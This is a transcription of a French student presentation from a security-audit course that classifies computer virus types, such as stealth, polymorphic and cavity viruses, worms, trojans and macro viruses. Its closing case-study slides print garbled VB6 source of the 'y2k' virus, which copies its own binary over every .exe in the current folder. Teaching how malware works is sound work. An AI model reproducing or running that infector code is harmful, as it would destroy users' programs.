Projet d’outils de l’audit Sujet: Types de virus Groupe: M2SSICE G2

Slides:



Advertisements
Présentations similaires
Un environnement de développement éducatif
Advertisements

Module Systèmes d’exploitation
Stockage de données.
Portée des variables VBA & Excel
Sécurité informatique
1 1 Momentum. 2 2 Tout objet en mouvement continuera son mouvement tant que rien nentrave sa progression.
Le developpement web  Préparé par : ASSAL Lamiae JAMALI Zakarya
Cours n°2M2. IST-IE (S. Sidhom) UE 303 Promo. M2 IST-IE 2005/06 Conception dun système d'information multimédia Architecture trois-tiers : PHP/MySQL &
Architecture de réseaux
Performances 1 Évolution : Performance. Performances 2 Évolution : Mémoire.
LES VIRUS CHARLES Chrystelle Semestre 2 Année 2005/06
Les virus informatiques
Introduction à la POO: Les classes vs les objets
Cours Visual Basic pour Application
Travaux pratiques sur Nooj
Systèmes d’exploitation
Les requêtes La Requête est une méthode pour afficher les enregistrements qui répondent à des conditions spécifiques. La requête est donc un filtre.
Par Fabrice Pasquier Cours III
Page 1 Introduction à ATEasy 3.0 Page 2 Quest ce quATEasy 3.0? n Ensemble de développement très simple demploi n Conçu pour développer des bancs de test.
Formation Centra - GDE.
Comment détecter et éliminer
PAFI Référentiel de données par Sonia Watts DGIF (Direction de la gestion et de linformation forestière) 27 octobre 2010 et 3 novembre 2010.
Administration système
44 Contrôle du déroulement du programme. 4-2 Objectifs A la fin de ce cours, vous serez capables de : Utiliser les constructions de prise de décision.
LES ANTIVIRUS.
Vuibert Systèmes dinformation et management des organisations 6 e édition R. Reix – B. Fallery – M. Kalika – F. Rowe Chapitre 2 : Les applications fonctionnelles.
LES VIRUS INFORMATIQUES.
Configuration de Windows Server 2008 Active Directory
1 CLUB DES UTILISATEURS SAS DE QUÉBEC COMMENT TRANSFORMER UN PROGRAMME SAS EN TÂCHE PLANIFIÉE SOUS WINDOWS Présentation de Jacques Pagé STRiCT Technologies.
Interoperabilité des SI - Urbanisation
SIDENA BTS IRIS Session 2008 CARME Arnaud.
Formation Python Modules (d'après "Learning Python", de Mark Lutz)
Les pointeurs Modes d’adressage de variables. Définition d’un pointeur. Opérateurs de base. Opérations élémentaires. Pointeurs et tableaux. Pointeurs et.
Développer en C avec Eclipse Introduction Création d'un projet Ajout de fichiers Compilation Exécution Utiliser le débogueur Département dinformatique.
66 Utilisation des classes et des objets. 6-2 Objectifs A la fin de ce cours, vous serez capables de : Créer de nouvelles classes à laide de Eclipse Utiliser.
1 GPA435 Systèmes dexploitation et programmation de système Copyright, 2000 © Tony Wong, Ph.D., ing. Chapitre 4 Syntaxe des commandes, documentation standard,
Notre calendrier français MARS 2014
Quelle heure est-il ??. THE TIME: OCLOCK IL EST HEURE IL EST + + HEURES etc.
Conception des Réalisé par : Nassim TIGUENITINE.
Excel (Partie 2).
Le workflow Encadré par: M . BAIDADA Réalisé par: ATRASSI Najoua
ECOLE DES HAUTES ETUDES COMMERCIALES MARKETING FONDAMENTAL
Dépannage et récupération de Windows 8
ECOLE DES HAUTES ETUDES COMMERCIALES MARKETING FONDAMENTAL
ECOLE DES HAUTES ETUDES COMMERCIALES MARKETING FONDAMENTAL
ECOLE DES HAUTES ETUDES COMMERCIALES MARKETING FONDAMENTAL
1 Modèle pédagogique d’un système d’apprentissage (SA)
Biologie – Biochimie - Chimie
Les dangers d'Internet (virus et autres)
10 paires -. 9 séries de 3 étuis ( n° 1 à 27 ) 9 positions à jouer 5 tables Réalisé par M..Chardon.
Programmer en langage c
CALENDRIER-PLAYBOY 2020.
1 Architecture orientée service SOA Architecture orientée service SOA (Service Oriented Architecture)
Outil de gestion des cartes grises
USAM BRIDGE H O W E L L -CLASSIQUE
Centre d’échange d’informations sur la Convention sur la Diversité Biologique Bienvenue dans le cours sur l’ajout d’une page web sur un site web développé.
9 paires séries de 3 étuis ( n° 1 à 27 )
- énergie bornée (tend vers 0 lorsque
Quel est l’intérêt d’utiliser le diagramme de Gantt dans la démarche de projet A partir d’un exemple concret, nous allons pouvoir exploiter plusieurs parties.
Vue d’ensemble des outils du PRISM Dakar, 3 au 21 Mai 2010
Architecture Chapitre 4 Interruptions. 2 Plan Principe Schéma d’acquisition Les états d’une interruption Décentralisation des interruptions Exemples.
Nouveau site 1. Pour se connecter vous devez saisir : - Votre adresse - le mot de passe qui vous a été communiqué 2 LA CONNECTION.
PPE Bouchard Rémi Courot Lucas Donnay Thomas Floret Thomas.
Relevez le numéro de votre logo préféré et adressez-le à : En cas d’hésitation, vous pouvez choisir jusqu’à 3 logos. Seront pris.
UTILISATION DE MIOGA Patrick LE DELLIOU
Présente Conception d’un petit site Web. 2 4-nov-03© Préambule Cette présentation fait suite à celle intitulée « Imaginer, concevoir, mettre.
Tirer le meilleur parti d’Office /10/ Vincent Bippus IT/OIS 07 octobre 2014.
Réalisé par : Mr IRZIM Hédi Mr JRAD Firas
Les virus informatiques
Back Orifice Scénario en 3 étapes - Préparation & envoi - Infection & Installation - Prise de contrôle - Détections Possibles - Net-Based - Host-Based.
Transcription de la présentation:

Projet d’outils de l’audit Sujet: Types de virus Groupe: M2SSICE G2 Travail réalisé par: AMARA Mohamed Mehdi MEJRI Firas MOHAMED Marwa RABEH Zied WESLETI Emna

Introduction Définition d’un virus informatique:  logiciel malveillant s’insérant dans des logiciels légitimes (hôtes). Propagation à travers tout moyen d’échange de données numériques  Virus informatique vers informatique

Types de virus (1/2) Type de propagation : - les virus furtifs - les virus compagnons - les virus souterrains - les virus polymorphes - les virus cavité - les virus blindés - les virus compte gouttes - les bombes ANSI

Types de virus (2/2) Vitesse de propagation: - les infecteurs normaux - les infecteurs rapides - les infecteurs lents - les infecteurs occasionnels - les vers informatiques - les chevaux de Troie - les macro virus

Les virus furtifs Dissimuler des modifications apportées aux fichiers ou aux secteurs boot. Duper les antivirus  données saines lors de l'analyse Exemple: virus systèmes et virus applications (brain, frodo .. )

Les virus compagnons Créer un fichier copie ayant le même nom du fichier victime. Exécuter la version copie infectée au  premier lieu. Indétectable par les vérificateurs d’intégrité. 

Les virus souterrains Appeler directement des vecteurs d'interruptions DOS et BIOS . Détecter certains virus inconnus et non-détectables.

Les virus polymorphes Produire des copies variées opérationnelles de lui- même. Présenter différentes copies pour ne pas pouvoir détecter toutes les variantes . Modifier sa représentation lors du réplication.

Les virus cavité Ecraser une partie du fichier hôte contenant des constantes (généralement les 0). Ne pas augmenter la taille du fichier. Préserver la fonctionnalité du fichier.

Les virus blindés Utiliser des astuces spéciales pour ne pas comprendre son code. Utiliser des ruses techniques pour durcir son désassemblage.

Les infecteurs Les infecteurs rapides : infecter les programmes exécutés et ouverts. Les infecteurs lents : infecter les fichiers modifiés ou crées.

Les vers Informatiques Programme complet n’a pas besoin de programmes hôtes. Vers de stations de travail : contenu dans le système (lapin) Vers de réseaux : segment principal coordonnant les actions des autres segments (pieuvres)

Les virus compte gouttes Mécanisme d’injection de code du virus dans le code d’un programme. Elargissement de la taille du code du virus lors de l’exécution du programme.

Les macro virus Spécifiques à l’infection des documents non des programmes. Consacrés au version de systèmes d’exploitation (DOS, Macintosh). Exemple: Concept, Wazzu, Npad, Cap

Les infecteurs occasionnels Infection de manière irrégulière en réduisant la probabilité d’être découvert. Un mécanisme basé sur la fréquence d’infection

Les bombes ANSI Utiliser des Techniques de reprogrammation d'un clavier utilisé en mode console ANSI. Exemple: Readme ANSI Bomb, Die ANSI Bomb…

Les infecteurs normaux Infecter le programme ciblé en parallèle avec l’exécution de ce virus Exemple: Jerusalem

Les chevaux de Troie Trojan Horse : logiciel d’apparence légitime, conçu pour exécuter des actions à l’insu de l'utilisateur. Se propager facilement à d’autres programmes. Exemple: Back Orifice, Y3k Rat …

Exemple: Etude de cas pratique(0/5) Analyse fonctionnelle du virus y2k: Y2K (Y pour year, 2K pour 2000) fut le sigle américain le plus couramment employé pour désigner le problème d’un cheval de troie. Le terme millennium bug (« bogue du millénaire ») a aussi été utilisé aux États-Unis. Sur certains ordinateurs, le programme crashe avant de faire des dommages mais sur d´autres, il prétendra réparer des problèmes de l´An 2000 sur votre ordinateur alors qu´il réécrit le disque dur.

Exemple: Etude de cas pratique(1/5) Mode de fonctionnement du virus y2k (code source): - Définition des variables: Option Explicit Option Explicit  Dim myarray() As Byte myarray Dim () As Byte  Dim victim As String victime Dim As String Const mysize As Integer = 11776 mysize Const As Integer = 11776

Exemple: Etude de cas pratique(2/5) - Initialisation: Private Sub Form_Load() Private Sub Form_Load ()  On Error Resume Next On Error Resume Next Dim Free Dim gratuit Free = FreeFile Free = FreeFile

Exemple: Etude de cas pratique(3/5) - Extraire le code binaire de notre virus et le stocker dans la variable myaray: : Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As Free //Free Open App.Path & "\" & App.EXEName & ". Exe" pour l'accès binaire  ReDim myarray(mysize) ReDim MonTableau (mysize) //obtenir myarray Get 1, 1,Close Free

Exemple: Etude de cas pratique(4/5) - Définir la variable victime et mettre le code binaire dans le programme cible : victim = Dir(App.Path & "\" & "*.EXE") victime = Dir (App.Path & "\" & "*. exe") While victim <> "" Bien que victime <> "" Open App.Path & "\" & victim For Binary Access Write As Free //pour l’accès binaire  Put 1, , myarray //mettre le code binaire dans le programme de la victime Put 1, , mysize Close Free

Exemple: Etude de cas pratique(5/5) - Mise à zéro de la victime et répétition de l'ensemble du processus d'infection de tous les fichiers « .exe » dans le répertoire courant: victim = Dir() victime = Dir ()  Wend Wend - Fermeture du programme et des sous dossiers: End End End Sub End Sub

Merci pour votre attention